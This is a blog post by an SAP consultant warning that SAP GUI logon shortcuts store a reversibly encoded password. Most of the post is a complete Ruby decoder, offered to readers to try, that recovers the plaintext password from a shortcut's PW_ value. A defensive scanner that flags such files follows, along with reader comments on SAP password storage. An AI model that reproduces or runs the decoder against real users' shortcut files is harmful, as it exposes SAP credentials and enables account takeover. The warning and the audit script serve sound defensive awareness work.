Decoding the SAP logon password

Users can create a shortcut holding the SAP connection details from the SAP GUI. Nothing new so far; the worrying part is that this shortcut, which is basically a file containing the path to the binary, the user and the encoded password, can be decoded with this small script to reveal the password.

So now you know, Basis consultant: no shortcuts.

Here is the code, in Ruby, for you to try out and tell me how it goes.

#!/usr/bin/env ruby
#
# SAP Easy Access Password Decoder (Kernel 640)
# Supported character set A-Z,a-z,0-9,\/|<>,.;'#~@:[]{}+=()*&^%$£"!`
#
# Author: Mylestro
# Date: 17/02/2011
#

PROG_VER = 1.0

# @master[n] holds the lookup table for the n-th password character (1-8).
@master = Array.new

# Build the eight per-position tables (hex pair => plaintext character).
def populate_arrays
  @one = {"19" => "a", "39" => "A", "1A" => "b", "3A" => "B", "1B" => "c", "3B" => "C", "1C" => "d", "3C" => "D", "1D" => "e", "3D" => "E", "1E" => "f", "3E" => "F", "1F" => "g", "3F" => "G", "10" => "h", "30" => "H", "11" => "i", "31" => "I", "12" => "j", "32" => "J", "13" => "k", "33" => "K", "14" => "l", "34" => "L", "15" => "m", "35" => "M", "16" => "n", "36" => "N", "17" => "o", "37" => "O", "08" => "p", "28" => "P", "09" => "q", "29" => "Q", "0A" => "r", "2A" => "R", "0B" => "s", "2B" => "S", "0C" => "t", "2C" => "T", "0D" => "u", "2D" => "U", "0E" => "v", "2E" => "V", "0F" => "w", "2F" => "W", "00" => "x", "20" => "X", "01" => "y", "21" => "Y", "02" => "z", "22" => "Z", "48" => "0", "49" => "1", "4A" => "2", "4B" => "3", "4C" => "4", "4D" => "5", "4E" => "6", "4F" => "7", "40" => "8", "41" => "9", "59" => "!", "5C" => "$", "DB" => "£", "5D" => "%", "38" => "@", "26" => "^", "52" => "*", "50" => "(", "51" => ")", "53" => "+", "45" => "=", "06" => "~", "5B" => "#", "44" => "<", "46" => ">", "24" => "\\", "57" => "/", "47" => "?", "56" => ".", "54" => ",", "43" => ";", "42" => ":", "5F" => "'", "03" => "{", "05" => "}", "23" => "[", "25" => "]", "18" => "`", "04" => "|"}
  @two = {"E0" => "a", "C0" => "A", "E3" => "b", "C3" => "B", "E2" => "c", "C2" => "C", "E5" => "d", "C5" => "D", "E4" => "e", "C4" => "E", "E7" => "f", "C7" => "F", "E6" => "g", "C6" => "G", "E9" => "h", "C9" => "H", "E8" => "i", "C8" => "I", "EB" => "j", "CB" => "J", "EA" => "k", "CA" => "K", "ED" => "l", "CD" => "L", "EC" => "m", "CC" => "M", "EF" => "n", "CF" => "N", "EE" => "o", "CE" => "O", "F1" => "p", "D1" => "P", "F0" => "q", "D0" => "Q", "F3" => "r", "D3" => "R", "F2" => "s", "D2" => "S", "F5" => "t", "D5" => "T", "F4" => "u", "D4" => "U", "F7" => "v", "D7" => "V", "F6" => "w", "D6" => "W", "F9" => "x", "D9" => "X", "F8" => "y", "D8" => "Y", "FB" => "z", "DB" => "Z", "B1" => "0", "B0" => "1", "B3" => "2", "B2" => "3", "B5" => "4", "B4" => "5", "B7" => "6", "B6" => "7", "B9" => "8", "B8" => "9", "A0" => "!", "A5" => "$", "22" => "£", "A4" => "%", "C1" => "@", "DF" => "^", "AB" => "*", "A9" => "(", "A8" => ")", "AA" => "+", "BC" => "=", "FF" => "~", "A2" => "#", "BD" => "<", "BF" => ">", "DD" => "\\", "AE" => "/", "BE" => "?", "AF" => ".", "AD" => ",", "BA" => ";", "BB" => ":", "A6" => "'", "FA" => "{", "FC" => "}", "DA" => "[", "DC" => "]", "E1" => "`", "FD" => "|"}
  @three = {"72" => "a", "52" => "A", "71" => "b", "51" => "B", "70" => "c", "50" => "C", "77" => "d", "57" => "D", "76" => "e", "56" => "E", "75" => "f", "55" => "F", "74" => "g", "54" => "G", "7B" => "h", "5B" => "H", "7A" => "i", "5A" => "I", "79" => "j", "59" => "J", "78" => "k", "58" => "K", "7F" => "l", "5F" => "L", "7E" => "m", "5E" => "M", "7D" => "n", "5D" => "N", "7C" => "o", "5C" => "O", "63" => "p", "43" => "P", "62" => "q", "42" => "Q", "61" => "r", "41" => "R", "60" => "s", "40" => "S", "67" => "t", "47" => "T", "66" => "u", "46" => "U", "65" => "v", "45" => "V", "64" => "w", "44" => "W", "6B" => "x", "4B" => "X", "6A" => "y", "4A" => "Y", "69" => "z", "49" => "Z", "23" => "0", "22" => "1", "21" => "2", "20" => "3", "27" => "4", "26" => "5", "25" => "6", "24" => "7", "2B" => "8", "2A" => "9", "32" => "!", "37" => "$", "B0" => "£", "36" => "%", "53" => "@", "4D" => "^", "39" => "*", "3B" => "(", "3A" => ")", "38" => "+", "2E" => "=", "6D" => "~", "30" => "#", "2F" => "<", "2D" => ">", "4F" => "\\", "3C" => "/", "2C" => "?", "3D" => ".", "3F" => ",", "28" => ";", "29" => ":", "34" => "'", "68" => "{", "6E" => "}", "48" => "[", "4E" => "]", "73" => "`", "6F" => "|"}
  @four = {"49" => "a", "69" => "A", "4A" => "b", "6A" => "B", "4B" => "c", "6B" => "C", "4C" => "d", "6C" => "D", "4D" => "e", "6D" => "E", "4E" => "f", "6E" => "F", "4F" => "g", "6F" => "G", "40" => "h", "60" => "H", "41" => "i", "61" => "I", "42" => "j", "62" => "J", "43" => "k", "63" => "K", "44" => "l", "64" => "L", "45" => "m", "65" => "M", "46" => "n", "66" => "N", "47" => "o", "67" => "O", "58" => "p", "78" => "P", "59" => "q", "79" => "Q", "5A" => "r", "7A" => "R", "5B" => "s", "7B" => "S", "5C" => "t", "7C" => "T", "5D" => "u", "7D" => "U", "5E" => "v", "7E" => "V", "5F" => "w", "7F" => "W", "50" => "x", "70" => "X", "51" => "y", "71" => "Y", "52" => "z", "72" => "Z", "18" => "0", "19" => "1", "1A" => "2", "1B" => "3", "1C" => "4", "1D" => "5", "1E" => "6", "1F" => "7", "10" => "8", "11" => "9", "09" => "!", "0C" => "$", "8B" => "£", "0D" => "%", "68" => "@", "76" => "^", "02" => "*", "00" => "(", "01" => ")", "03" => "+", "15" => "=", "56" => "~", "0B" => "#", "14" => "<", "16" => ">", "74" => "\\", "07" => "/", "17" => "?", "06" => ".", "04" => ",", "13" => ";", "12" => ":", "0F" => "'", "53" => "{", "55" => "}", "73" => "[", "75" => "]", "48" => "`", "54" => "|"}
  @five = {"81" => "a", "A1" => "A", "82" => "b", "A2" => "B", "83" => "c", "A3" => "C", "84" => "d", "A4" => "D", "85" => "e", "A5" => "E", "86" => "f", "A6" => "F", "87" => "g", "A7" => "G", "88" => "h", "A8" => "H", "89" => "i", "A9" => "I", "8A" => "j", "AA" => "J", "8B" => "k", "AB" => "K", "8C" => "l", "AC" => "L", "8D" => "m", "AD" => "M", "8E" => "n", "AE" => "N", "8F" => "o", "AF" => "O", "90" => "p", "B0" => "P", "91" => "q", "B1" => "Q", "92" => "r", "B2" => "R", "93" => "s", "B3" => "S", "94" => "t", "B4" => "T", "95" => "u", "B5" => "U", "96" => "v", "B6" => "V", "97" => "w", "B7" => "W", "98" => "x", "B8" => "X", "99" => "y", "B9" => "Y", "9A" => "z", "BA" => "Z", "D0" => "0", "D1" => "1", "D2" => "2", "D3" => "3", "D4" => "4", "D5" => "5", "D6" => "6", "D7" => "7", "D8" => "8", "D9" => "9", "C1" => "!", "C4" => "$", "43" => "£", "C5" => "%", "A0" => "@", "BE" => "^", "CA" => "*", "C8" => "(", "C9" => ")", "CB" => "+", "DD" => "=", "9E" => "~", "C3" => "#", "DC" => "<", "DE" => ">", "BC" => "\\", "CF" => "/", "DF" => "?", "CE" => ".", "CC" => ",", "DB" => ";", "DA" => ":", "C7" => "'", "9B" => "{", "9D" => "}", "BB" => "[", "BD" => "]", "80" => "`", "9C" => "|"}
  @six = {"A6" => "a", "86" => "A", "A5" => "b", "85" => "B", "A4" => "c", "84" => "C", "A3" => "d", "83" => "D", "A2" => "e", "82" => "E", "A1" => "f", "81" => "F", "A0" => "g", "80" => "G", "AF" => "h", "8F" => "H", "AE" => "i", "8E" => "I", "AD" => "j", "8D" => "J", "AC" => "k", "8C" => "K", "AB" => "l", "8B" => "L", "AA" => "m", "8A" => "M", "A9" => "n", "89" => "N", "A8" => "o", "88" => "O", "B7" => "p", "97" => "P", "B6" => "q", "96" => "Q", "B5" => "r", "95" => "R", "B4" => "s", "94" => "S", "B3" => "t", "93" => "T", "B2" => "u", "92" => "U", "B1" => "v", "91" => "V", "B0" => "w", "90" => "W", "BF" => "x", "9F" => "X", "BE" => "y", "9E" => "Y", "BD" => "z", "9D" => "Z", "F7" => "0", "F6" => "1", "F5" => "2", "F4" => "3", "F3" => "4", "F2" => "5", "F1" => "6", "F0" => "7", "FF" => "8", "FE" => "9", "E6" => "!", "E3" => "$", "64" => "£", "E2" => "%", "87" => "@", "99" => "^", "ED" => "*", "EF" => "(", "EE" => ")", "EC" => "+", "FA" => "=", "B9" => "~", "E4" => "#", "FB" => "<", "F9" => ">", "9B" => "\\", "E8" => "/", "F8" => "?", "E9" => ".", "EB" => ",", "FC" => ";", "FD" => ":", "E0" => "'", "BC" => "{", "BA" => "}", "9C" => "[", "9A" => "]", "A7" => "`", "BB" => "|"}
  @seven = {"61" => "a", "41" => "A", "62" => "b", "42" => "B", "63" => "c", "43" => "C", "64" => "d", "44" => "D", "65" => "e", "45" => "E", "66" => "f", "46" => "F", "67" => "g", "47" => "G", "68" => "h", "48" => "H", "69" => "i", "49" => "I", "6A" => "j", "4A" => "J", "6B" => "k", "4B" => "K", "6C" => "l", "4C" => "L", "6D" => "m", "4D" => "M", "6E" => "n", "4E" => "N", "6F" => "o", "4F" => "O", "70" => "p", "50" => "P", "71" => "q", "51" => "Q", "72" => "r", "52" => "R", "73" => "s", "53" => "S", "74" => "t", "54" => "T", "75" => "u", "55" => "U", "76" => "v", "56" => "V", "77" => "w", "57" => "W", "78" => "x", "58" => "X", "79" => "y", "59" => "Y", "7A" => "z", "5A" => "Z", "30" => "0", "31" => "1", "32" => "2", "33" => "3", "34" => "4", "35" => "5", "36" => "6", "37" => "7", "38" => "8", "39" => "9", "21" => "!", "24" => "$", "A3" => "£", "25" => "%", "40" => "@", "5E" => "^", "2A" => "*", "28" => "(", "29" => ")", "2B" => "+", "3D" => "=", "7E" => "~", "23" => "#", "3C" => "<", "3E" => ">", "5C" => "\\", "2F" => "/", "3F" => "?", "2E" => ".", "2C" => ",", "3B" => ";", "3A" => ":", "27" => "'", "7B" => "{", "7D" => "}", "5B" => "[", "5D" => "]", "60" => "`", "7C" => "|"}
  @eight = {"5F" => "a", "7F" => "A", "5C" => "b", "7C" => "B", "5D" => "c", "7D" => "C", "5A" => "d", "7A" => "D", "5B" => "e", "7B" => "E", "58" => "f", "78" => "F", "59" => "g", "79" => "G", "56" => "h", "76" => "H", "57" => "i", "77" => "I", "54" => "j", "74" => "J", "55" => "k", "75" => "K", "52" => "l", "72" => "L", "53" => "m", "73" => "M", "50" => "n", "70" => "N", "51" => "o", "71" => "O", "4E" => "p", "6E" => "P", "4F" => "q", "6F" => "Q", "4C" => "r", "6C" => "R", "4D" => "s", "6D" => "S", "4A" => "t", "6A" => "T", "4B" => "u", "6B" => "U", "48" => "v", "68" => "V", "49" => "w", "69" => "W", "46" => "x", "66" => "X", "47" => "y", "67" => "Y", "44" => "z", "64" => "Z", "0E" => "0", "0F" => "1", "0C" => "2", "0D" => "3", "0A" => "4", "0B" => "5", "08" => "6", "09" => "7", "06" => "8", "07" => "9", "1F" => "!", "1A" => "$", "9D" => "£", "1B" => "%", "7E" => "@", "60" => "^", "14" => "*", "16" => "(", "17" => ")", "15" => "+", "03" => "=", "40" => "~", "1D" => "#", "02" => "<", "00" => ">", "62" => "\\", "11" => "/", "01" => "?", "10" => ".", "12" => ",", "05" => ";", "04" => ":", "19" => "'", "45" => "{", "43" => "}", "65" => "[", "63" => "]", "5E" => "`", "42" => "|"}
  @master[1] = @one
  @master[2] = @two
  @master[3] = @three
  @master[4] = @four
  @master[5] = @five
  @master[6] = @six
  @master[7] = @seven
  @master[8] = @eight
end

# Print the character that the hex pair at the given position (1-8) stands for.
def char_lookup(position, current_char)
  temp = @master[position]
  print temp[current_char]
end

begin
  populate_arrays
  if ARGV.size != 1
    puts "[-] Invalid number of arguments"
    exit
  end
  hash = ARGV[0].split("PW_")
  # Without a PW_ prefix there is nothing to look up.
  if hash[1].nil?
    puts "[-] No PW_ value found in argument"
    exit
  end
  if hash[1].length > 16
    puts "[-] Password is over 8 characters, not supported"
    exit
  end
  hash = hash[1].upcase # table keys are upper-case hex

  if hash.length % 2 != 0
    puts "[-] Invalid hash length"
    exit
  end

  hash_size = hash.length / 2
  print "[+] Decoded password: "
  position = 1
  value = 0
  hash_size.times do
    current_char = hash[value, 2] # two hex digits per password character
    char_lookup(position, current_char)
    value = value + 2
    position = position.next
  end
  puts # end the output line
end

via: msploit
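
To act on the "no shortcuts" advice, the following added example (not part of the original post or of Mylestro's script) audits a directory tree for files that still carry a `PW_` token and reports where they are without printing the value. The extension list, the size limit and the sample layout are assumptions; only the `PW_` prefix followed by hex digits comes from the script above.

```ruby
require "find"

# Assumption: a stored password appears as the literal prefix PW_ followed by
# hex digits, which is the form the decoder on this page splits on.
PW_TOKEN = /PW_([0-9A-Fa-f]{2,})/
# Hypothetical extension list; adjust it to how shortcuts are saved locally.
SHORTCUT_EXTS = %w[.sap .bat .cmd .txt].freeze
MAX_BYTES = 1_048_576 # shortcut files are tiny, skip anything large

Finding = Struct.new(:path, :line_no, :chars, :supported)

# Scan one blob of text. Reports where a token sits and how long the password
# is, but never echoes the token itself, so the report can go into a ticket.
def scan_text(text, path = "(inline)")
  findings = []
  text.each_line.with_index(1) do |line, line_no|
    line.scan(PW_TOKEN).each do |(hex)|
      # The page's script accepts an even number of hex digits, at most 16.
      supported = hex.length.even? && hex.length <= 16
      findings << Finding.new(path, line_no, hex.length / 2, supported)
    end
  end
  findings
end

# Walk a directory tree and scan every small file with a listed extension.
def scan_tree(root, exts = SHORTCUT_EXTS)
  findings = []
  Find.find(root) do |path|
    next unless File.file?(path) && exts.include?(File.extname(path).downcase)
    next if File.size(path) > MAX_BYTES
    findings.concat(scan_text(File.binread(path), path))
  end
  findings
end

# Constructed sample, not the real shortcut layout: only the PW_ token matters.
SAMPLE = <<~TXT
  binary=<path-to-binary>
  user=DEMO
  password=PW_0011223344556677
  comment=nothing stored on this line
TXT

hits = ARGV[0] && File.directory?(ARGV[0]) ? scan_tree(ARGV[0]) : scan_text(SAMPLE)
hits.each { |f| puts "#{f.path}:#{f.line_no} stored password, #{f.chars} chars" }
```

Run it with a directory as the only argument to scan that tree; with no argument it scans the constructed sample.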

cyfuss

I'm Antonio Mejias in real life, cyfuss on the internet, technical lead and OpenText - SAP consultant in my working life, and a photography and music enthusiast the rest of the time. I'm delighted that you've taken an interest in me and what I do... don't hesitate to get in touch!

2 thoughts on “Decoding the SAP logon password”

  • 04/01/2016 at 18:52

    Hi Antonio.

    How can the SAP (B1) user be verified via the web? From what I have seen, the USR0 table has the nick field, the encrypted password and a salt field. Which encryption function is used to store the password?

    Thanks.

    • cyfuss
      08/01/2016 at 20:59

      Hi Manuel,

      I'm not really sure which encryption function standard SAP uses (depending on the version it may be MD5 or SHA-1); what I can tell you, in case you need to encrypt a password via ABAP, is that you can use the function module FIEB_PASSWORD_ENCRYPT to encrypt it and FIEB_PASSWORD_DECRYPT to decrypt it.

      I hope I was able to help…

      Regards
      Antonio
